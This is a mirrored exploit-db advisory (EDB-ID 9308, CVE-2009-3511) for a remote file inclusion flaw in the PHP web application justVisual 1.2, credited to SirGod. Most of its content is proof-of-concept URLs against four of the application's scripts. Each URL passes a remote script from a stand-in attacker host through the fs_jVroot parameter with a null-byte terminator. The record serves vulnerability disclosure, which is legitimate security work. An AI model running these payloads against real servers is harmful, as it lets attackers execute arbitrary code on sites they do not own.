- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 9308
- Проверка EDB
-
- Пройдено
- Автор
- SIRGOD
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2009-3511
- Дата публикации
- 2009-07-30
Код:
##################################################################################################################
[+] justVisual 1.2 (fs_jVroot) Remote File Inclusion Vulnerabilities
[+] Discovered By SirGod
[+] http://insecurity-ro.org
[+] http://h4cky0u.org
##################################################################################################################
[+] Download : http://www.fh54.de/justVisual/justVisual_1.2.zip
[+] Remote File Inclusion
- Vulnerable code is everywhere
- PoC's
http://127.0.0.1/path/justVisual/sites/site/pages/index.php?fs_jVroot=http://evilsite.com/evilscript.txt%00
http://127.0.0.1/path/justVisual/sites/test/pages/contact.php?fs_jVroot=http://evilsite.com/evilscript.txt%00
http://127.0.0.1/path/justVisual/system/pageTemplate.php?fs_jVroot=http://evilsite.com/evilscript.txt%00
http://127.0.0.1/path/justVisual/system/utilities.php?fs_jVroot=http://evilsite.com/evilscript.txt%00
##################################################################################################################
# milw0rm.com [2009-07-30]- Источник
- www.exploit-db.com
